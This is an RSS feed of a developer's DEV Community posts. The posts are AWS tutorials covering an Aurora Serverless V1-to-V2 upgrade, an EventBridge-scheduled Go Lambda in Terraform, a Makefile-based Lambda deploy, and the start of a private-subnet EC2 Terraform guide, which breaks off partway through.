<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Rhuaridh</title>
    <description>The latest articles on DEV Community by Rhuaridh (@rhuaridh).</description>
    <link>https://dev.to/rhuaridh</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rhuaridh"/>
    <language>en</language>
    <item>
      <title>Aurora Serverless V1 to V2 Migration</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 26 Feb 2023 19:31:49 +0000</pubDate>
      <link>https://dev.to/rhuaridh/aurora-serverless-v1-to-v2-migration-1gl2</link>
      <guid>https://dev.to/rhuaridh/aurora-serverless-v1-to-v2-migration-1gl2</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;So you have been enjoying running your MySQL 5.7 compatible database in Aurora Serverless V1. It's serverless, so by definition you don't need to worry about servers. Right?&lt;/p&gt;

&lt;p&gt;Well that story rings true right up until you want to upgrade your Aurora Serverless database to be compatible with MySQL 8.0, then you might notice the checkbox is mysteriously missing for 8.0.&lt;/p&gt;

&lt;p&gt;Let me take you on a &lt;strong&gt;not-so-serverless&lt;/strong&gt; upgrade journey!&lt;/p&gt;

&lt;h2&gt;
  
  
  Upgrade Map
&lt;/h2&gt;

&lt;p&gt;First, take a look at my upgrade map:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwf9xplcvbpeqf3ssaeq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftwf9xplcvbpeqf3ssaeq.png" alt="Aurora Serverless V1 to V2 Upgrade"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's right, in order to upgrade a &lt;strong&gt;serverless&lt;/strong&gt; database we need to &lt;strong&gt;provision&lt;/strong&gt; no fewer than 2 servers before making the switch back to &lt;strong&gt;serverless&lt;/strong&gt;.&lt;/p&gt;

&lt;h5&gt;
  
  
  Related Links
&lt;/h5&gt;

&lt;p&gt;From the official docs, here are some helpful links from AWS:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2.upgrade.html#aurora-serverless-v2.upgrade-from-serverless-v1-procedure" rel="noopener noreferrer"&gt;Upgrading from an Aurora Serverless v1 cluster to Aurora Serverless v2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2-administration.html#aurora-serverless-v2-converting-from-provisioned" rel="noopener noreferrer"&gt;Converting a provisioned writer or reader to Aurora Serverless v2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Step 1) Switch to Provisioned
&lt;/h3&gt;

&lt;p&gt;First up, always take a snapshot. Who knows where this winding upgrade path will lead, so having a backup point is vital. &lt;/p&gt;

&lt;p&gt;The snapshot can then be restored as a new &lt;strong&gt;provisioned&lt;/strong&gt; cluster.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2) Upgrade to MySQL 8.0
&lt;/h3&gt;

&lt;p&gt;Provisioned clusters support both 5.7 and 8.0 compatible databases. So we can now modify the instance and select a version compatible with MySQL 8.0.&lt;/p&gt;

&lt;h5&gt;
  
  
  Why can't I upgrade from 5.7 to 8.0?
&lt;/h5&gt;

&lt;p&gt;If you can see 8.0 as an option then skip this step. If not then read on!&lt;/p&gt;

&lt;p&gt;Different minor version have different "&lt;em&gt;valid&lt;/em&gt;" upgrades. While I'm not sure why AWS don't allow certain minor versions to upgrade to 8.0, what I do know is that you can use the following CLI calls to check.&lt;/p&gt;

&lt;p&gt;For example, at the time of writing this &lt;code&gt;5.7.mysql_aurora.2.08.3&lt;/code&gt; doesn't support an &lt;code&gt;8.0&lt;/code&gt; upgrade. You can see this by running the following command and substituting your &lt;code&gt;--engine-version&lt;/code&gt;.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;

aws rds describe-db-engine-versions &lt;span class="nt"&gt;--engine&lt;/span&gt; aurora-mysql &lt;span class="se"&gt;\ &lt;/span&gt;
  &lt;span class="nt"&gt;--engine-version&lt;/span&gt; 5.7.mysql_aurora.2.08.3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'DBEngineVersions[].ValidUpgradeTarget[].EngineVersion'&lt;/span&gt;
&lt;span class="o"&gt;[]&lt;/span&gt;


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;But if we perform a minor upgrade to &lt;code&gt;5.7.mysql_aurora.2.09.2&lt;/code&gt; first then we can upgrade to an &lt;code&gt;8.0&lt;/code&gt; version.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;

&lt;p&gt;aws rds describe-db-engine-versions &lt;span class="nt"&gt;--engine&lt;/span&gt; aurora-mysql &lt;span class="se"&gt;&amp;lt;/span&amp;gt;&lt;br&gt;
  &lt;span class="nt"&gt;--engine-version&lt;/span&gt; 5.7.mysql_aurora.2.09.2 &lt;span class="se"&gt;&amp;lt;/span&amp;gt;&lt;br&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'DBEngineVersions[].ValidUpgradeTarget[].EngineVersion'&lt;/span&gt;&lt;br&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.09.3"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.1"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.2"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.10.3"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"5.7.mysql_aurora.2.11.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.01.1"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.02.0"&lt;/span&gt;,&lt;br&gt;
    &lt;span class="s2"&gt;"8.0.mysql_aurora.3.02.2"&lt;/span&gt;&lt;br&gt;
&lt;span class="o"&gt;]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h3&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  Step 3) Switch to Serverless V2&lt;br&gt;
&lt;/h3&gt;

&lt;p&gt;Now that your provisioned cluster supports MySQL 8.0 you can finally select the &lt;a href="https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-serverless-v2-administration.html#aurora-serverless-v2-converting-from-provisioned" rel="noopener noreferrer"&gt;upgrade the writer instance&lt;/a&gt; to be &lt;strong&gt;Serverless V2&lt;/strong&gt;!&lt;/p&gt;

&lt;p&gt;It only took 3+ database upgrades to perform one MySQL version jump.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Honestly, consider just spinning up a new V2 cluster and using &lt;code&gt;mysqldump&lt;/code&gt; instead. This upgrade path is far too convoluted!&lt;/p&gt;

&lt;p&gt;The only occasion where I would recommend this over the old-fashioned &lt;code&gt;mysqldump&lt;/code&gt; approach is if your database sizes are too large to be quickly exported/imported.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>aurora</category>
      <category>database</category>
    </item>
    <item>
      <title>Lambda Cron Example (Terraform)</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 01 Oct 2022 15:59:26 +0000</pubDate>
      <link>https://dev.to/rhuaridh/lambda-cron-example-terraform-c8k</link>
      <guid>https://dev.to/rhuaridh/lambda-cron-example-terraform-c8k</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;A common issue people experience when transitioning to serverless infrastructure is finding where to configure a cron.&lt;/p&gt;

&lt;p&gt;During this article we will look at using EventBridge to trigger a lambda on a schedule. We will implement this using Terraform.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup Golang Lambda
&lt;/h2&gt;

&lt;p&gt;I will gloss over the section of creating a lambda, as this is something I have covered in &lt;a href="https://rhuaridh.co.uk/blog/deploy-golang-lambda-example.html" rel="noopener noreferrer"&gt;Golang&lt;/a&gt; and &lt;a href="https://rhuaridh.co.uk/blog/deploy-python-lambda-example.html" rel="noopener noreferrer"&gt;Python&lt;/a&gt; already.&lt;/p&gt;

&lt;p&gt;For this example we will use a simple Golang Hello World example.&lt;/p&gt;

&lt;p&gt;Create &lt;strong&gt;main.go&lt;/strong&gt;, then add this golang snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"log"&lt;/span&gt;

    &lt;span class="s"&gt;"context"&lt;/span&gt;

    &lt;span class="s"&gt;"github.com/aws/aws-lambda-go/lambda"&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Golang Lambda executed via Eventbridge Cron"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;lambda&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;handler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we will run these CLI commands to create our .zip file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Initialise our golang project&lt;/span&gt;
go mod init example.com/demo
go get github.com/aws/aws-lambda-go/lambda

&lt;span class="c"&gt;# If you are on a mac, let Go know you want linux&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;GOOS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;linux
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;GOARCH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;amd64
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;CGO_ENABLED&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0

&lt;span class="c"&gt;# Build our lambda&lt;/span&gt;
go build &lt;span class="nt"&gt;-o&lt;/span&gt; hello

&lt;span class="c"&gt;# Zip up our binary ready for terraform&lt;/span&gt;
zip &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt;.zip hello
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setup Terraform
&lt;/h2&gt;

&lt;p&gt;Create &lt;strong&gt;main.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~&amp;gt; 3.0"
    }
  }
}

# Configure the AWS Provider

provider "aws" {
  region = "eu-west-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This just lets terraform know that we want to use the AWS provider, and that we'll be working in the &lt;strong&gt;eu-west-1&lt;/strong&gt; region.&lt;/p&gt;

&lt;p&gt;You can now run this from the CLI to initialise terraform:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;terraform init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Create a Lambda in Terraform
&lt;/h2&gt;

&lt;p&gt;Create &lt;strong&gt;lambda.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create out lambda, using a locally sourced zip file
resource "aws_lambda_function" "demo_lambda_hello_world" {
  function_name = "demo-lambda-hello-world"
  role          = aws_iam_role.demo_lambda_role.arn
  package_type  = "Zip"
  handler       = "hello"
  runtime       = "go1.x"

  filename         = "function.zip"
  source_code_hash = filebase64sha256("function.zip")

  depends_on = [
    aws_iam_role.demo_lambda_role
  ]

  tags = {
    Name = "Demo Lambda Hello World"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Create IAM Role for Lambda
&lt;/h2&gt;

&lt;p&gt;Our lambda will need some basic permissions to work, these might look jarring at first but they are fairly straight forward once you read through them.&lt;/p&gt;

&lt;p&gt;Essentially, this role will be &lt;strong&gt;assumed&lt;/strong&gt; by our Lambda and give it access to write to &lt;strong&gt;Cloudwatch Logs&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Create &lt;strong&gt;iam.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Store the AWS account_id in a variable so we can reference it in our IAM policy
data "aws_caller_identity" "current" {}
data "aws_region" "current" {}

locals {
  account_id = data.aws_caller_identity.current.account_id
}

# Lambda IAM Role
resource "aws_iam_role" "demo_lambda_role" {
  name = "demo-lambda-role"

  assume_role_policy = jsonencode({
    "Version" : "2012-10-17",
    "Statement" : [
      {
        "Action" : "sts:AssumeRole",
        "Principal" : {
          "Service" : "lambda.amazonaws.com"
        },
        "Effect" : "Allow"
      }
    ]
  })

  inline_policy {
    name = "demo-lambda-policies"
    policy = jsonencode({
      "Version" : "2012-10-17",
      "Statement" : [
        {
          "Effect" : "Allow",
          "Action" : "logs:CreateLogGroup",
          "Resource" : "arn:aws:logs:${data.aws_region.current.name}:${local.account_id}:*"
        },
        {
          "Effect" : "Allow",
          "Action" : [
            "logs:CreateLogStream",
            "logs:PutLogEvents"
          ],
          "Resource" : [
            "arn:aws:logs:${data.aws_region.current.name}:${local.account_id}:log-group:/aws/lambda/*:*"
          ]
        }
      ]
    })
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setup our Cron
&lt;/h2&gt;

&lt;p&gt;Now that we have our lambda setup, we can &lt;a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/reference-cron-and-rate-expressions.html" rel="noopener noreferrer"&gt;set up the cron&lt;/a&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You can either use a cron, for example: &lt;strong&gt;cron(*/5 * * * ? *)&lt;/strong&gt; &lt;/li&gt;
&lt;li&gt;Or; you can use a rate, for example: &lt;strong&gt;rate(5 minutes)&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Create &lt;strong&gt;eventbridge.tf&lt;/strong&gt;, then add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create our schedule
resource "aws_cloudwatch_event_rule" "demo_lambda_every_5_minutes" {
  name                = "demo-lambda-every-5-minutes"
  description         = "Fires every 5 minutes"
  schedule_expression = "rate(5 minutes)"
}

# Trigger our lambda based on the schedule
resource "aws_cloudwatch_event_target" "trigger_lambda_on_schedule" {
  rule      = aws_cloudwatch_event_rule.demo_lambda_every_5_minutes.name
  target_id = "lambda"
  arn       = aws_lambda_function.demo_lambda_hello_world.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Add Lambda Permission
&lt;/h2&gt;

&lt;p&gt;In order for our cron to work, we need to let our Lambda know that EventBridge is allowed to Invoke it.&lt;/p&gt;

&lt;p&gt;Inside &lt;strong&gt;lambda.tf&lt;/strong&gt;, add this terraform snippet:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_lambda_permission" "allow_cloudwatch_to_call_split_lambda" {
  statement_id  = "AllowExecutionFromCloudWatch"
  action        = "lambda:InvokeFunction"
  function_name = aws_lambda_function.demo_lambda_hello_world.function_name
  principal     = "events.amazonaws.com"
  source_arn    = aws_cloudwatch_event_rule.demo_lambda_every_5_minutes.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Deploy Terraform
&lt;/h2&gt;

&lt;p&gt;First, run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform plan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, once we're confident we can run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform apply
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will now create the resources from the terraform files.&lt;/p&gt;

&lt;h2&gt;
  
  
  Confirm it's running
&lt;/h2&gt;

&lt;p&gt;After it has been running for 5 minutes you can check the Cloudwatch Logs group to confirm it has been triggered.&lt;/p&gt;

&lt;p&gt;To confirm it is working find your Lambda in the console, then select "Monitoring". You should now see your lambda running under "Recent invocations":&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3c9y5krhxm8yxn7653z4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3c9y5krhxm8yxn7653z4.png" alt="Cron Lambda Output"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cleanup
&lt;/h2&gt;

&lt;p&gt;If you were just experimenting, remember you can destroy the resources when you're done by running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform destroy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;While Lambda's are cheap to invoke, it is always good to keep your account clean to avoid any unnecessary billing.&lt;/p&gt;

&lt;p&gt;And that's it! You have now configured a Lambda cronjob using EventBridge.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>terraform</category>
      <category>lambda</category>
    </item>
    <item>
      <title>Deploy a Golang Lambda</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sat, 06 Aug 2022 18:18:20 +0000</pubDate>
      <link>https://dev.to/rhuaridh/deploy-a-golang-lambda-3c6f</link>
      <guid>https://dev.to/rhuaridh/deploy-a-golang-lambda-3c6f</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Quite often we just want a simple way to build and deploy a Golang Lambda in AWS without using SAM or Serverless.&lt;/p&gt;

&lt;p&gt;We will look at using the CLI to deploy a simple Golang lambda. This example will give us the building blocks to integrate this into a CI/CD pipeline later.&lt;/p&gt;

&lt;h2&gt;
  
  
  Video Walkthrough
&lt;/h2&gt;

&lt;p&gt;The written instructions are below, but here is a quick video walkthrough showing how to deploy the Golang Lambda.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/jktC__3LAYk"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  The Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Prerequisites
&lt;/h3&gt;

&lt;p&gt;This article assumes you have these installed already:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Golang&lt;/li&gt;
&lt;li&gt;AWS CLI&lt;/li&gt;
&lt;li&gt;The jq package for parsing json&lt;/li&gt;
&lt;li&gt;IAM permissions required to deploy the lambda&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2) Create main.go file
&lt;/h3&gt;

&lt;p&gt;Create a file called &lt;strong&gt;main.go&lt;/strong&gt; in the root directory.&lt;/p&gt;

&lt;p&gt;Here is a quick hello world script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
    "log"

    "context"

    "github.com/aws/aws-lambda-go/events"
    "github.com/aws/aws-lambda-go/lambda"
)

func handler(ctx context.Context, request events.APIGatewayProxyRequest) error {
    log.Println("HelloWorld from Golang Lambda")

    return nil
}

func main() {
    lambda.Start(handler)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3) Create Makefile
&lt;/h3&gt;

&lt;p&gt;Create a file called &lt;strong&gt;Makefile&lt;/strong&gt; in the root directory.&lt;/p&gt;

&lt;p&gt;Please edit the parameters for &lt;strong&gt;function name&lt;/strong&gt; and &lt;strong&gt;region&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export GOOS=linux
export GOARCH=amd64
export CGO_ENABLED=0
.DEFAULT_GOAL := deploy

deploy:
    go build -o hello
    zip -r function.zip hello
    aws lambda update-function-code --function-name "BlogHelloWorldExample" --zip-file fileb://function.zip --region="eu-west-1" | jq .    
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you receive the error &lt;code&gt;Makefile:6: *** missing separator. Stop.&lt;/code&gt;, make sure to replace the spaces with tabs.&lt;/p&gt;

&lt;h3&gt;
  
  
  4) Install Golang Dependencies
&lt;/h3&gt;

&lt;p&gt;You only need to do this step once:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go mod init example.com/demo
go get github.com/aws/aws-lambda-go/events
go get github.com/aws/aws-lambda-go/lambda
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5) Run Makefile
&lt;/h3&gt;

&lt;p&gt;Run the following CLI command to build, zip and deploy our example Lambda&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;make deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should now see output similar to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "FunctionName": "BlogHelloWorldExample",
  "FunctionArn": "arn:aws:lambda:eu-west-1:xyz:function:BlogHelloWorldExample",
  "Runtime": "go1.x",
  "Role": "arn:aws:iam::xyz:role/service-role/BlogHelloWorldExample-role-xyz",
  "Handler": "hello",
  "CodeSize": xyz,
  "Description": "",
  "Timeout": 15,
  "MemorySize": 512,
  "LastModified": "2022-06-07T11:09:28.000+0000",
  "CodeSha256": "xyz",
  "Version": "$LATEST",
  "TracingConfig": {
    "Mode": "PassThrough"
  },
  "RevisionId": "xyz",
  "State": "Active",
  "LastUpdateStatus": "InProgress",
  "LastUpdateStatusReason": "The function is being created.",
  "LastUpdateStatusReasonCode": "Creating"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;That's it! Your lambda should now be deployed. Hopefully this gives you a quick starting point for building your pipeline.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>lambda</category>
      <category>go</category>
    </item>
    <item>
      <title>Terraform - Place your EC2 instance in a private subnet</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 06 Mar 2022 13:52:33 +0000</pubDate>
      <link>https://dev.to/rhuaridh/terraform-place-your-ec2-instance-in-a-private-subnet-51eh</link>
      <guid>https://dev.to/rhuaridh/terraform-place-your-ec2-instance-in-a-private-subnet-51eh</guid>
      <description>&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;A regular problem in AWS is that everyone is too keen to get started. They use the default VPC provided and place everything inside the public subnet.&lt;/p&gt;

&lt;p&gt;This might work for a basic web app. However, if we have an EC2 instance running a database or any other private resource then we need to find better ways to secure them.&lt;/p&gt;

&lt;h2&gt;
  
  
  The solution
&lt;/h2&gt;

&lt;p&gt;We are going to look at using terraform to launch an AMI inside of a private subnet to stop external access.&lt;/p&gt;

&lt;p&gt;We will utilise a NAT Gateway to allow the ec2 instance to connect outwards for security updates.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3mud2e0akr0tr8bjip5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff3mud2e0akr0tr8bjip5.png" alt="AWS Network Diagram showing private subnet and NAT gateway"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Create provider.tf
&lt;/h3&gt;

&lt;p&gt;First up, let's create a &lt;strong&gt;provider.tf&lt;/strong&gt; file to let terraform know we will be using the aws provider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;provider "aws" {
    region = "${var.AWS_REGION}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create vars.tf
&lt;/h3&gt;

&lt;p&gt;You will notice above that we're already using a variables. Let's create our &lt;strong&gt;vars.tf&lt;/strong&gt; file to store these.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;variable "AWS_REGION" {    
    default = "eu-west-1"
}
variable "AMI" {
    type = map(string)

    default = {
        # For demo purposes only, we are using ubuntu for the web1 and db1 instances
        eu-west-1 = "ami-08ca3fed11864d6bb" # Ubuntu 20.04 x86
    }
}
variable "EC2_USER" {
    default = "ubuntu"
}
variable "PUBLIC_KEY_PATH" {
    default = "~/.ssh/id_rsa.pub" # Replace this with a path to your public key
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Create vpc.tf
&lt;/h3&gt;

&lt;p&gt;Next up, let's create our VPC that will contain one public subnet and one private subnet. We will create this inside of the &lt;strong&gt;eu-west-1a&lt;/strong&gt; availability zone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_vpc" "prod-vpc" {
    cidr_block = "10.0.0.0/16"
    enable_dns_support = "true"
    enable_dns_hostnames = "true"

    tags = {
        Name = "prod-vpc"
    }
}

resource "aws_subnet" "prod-subnet-public-1" {
    vpc_id = "${aws_vpc.prod-vpc.id}"
    cidr_block = "10.0.1.0/24"
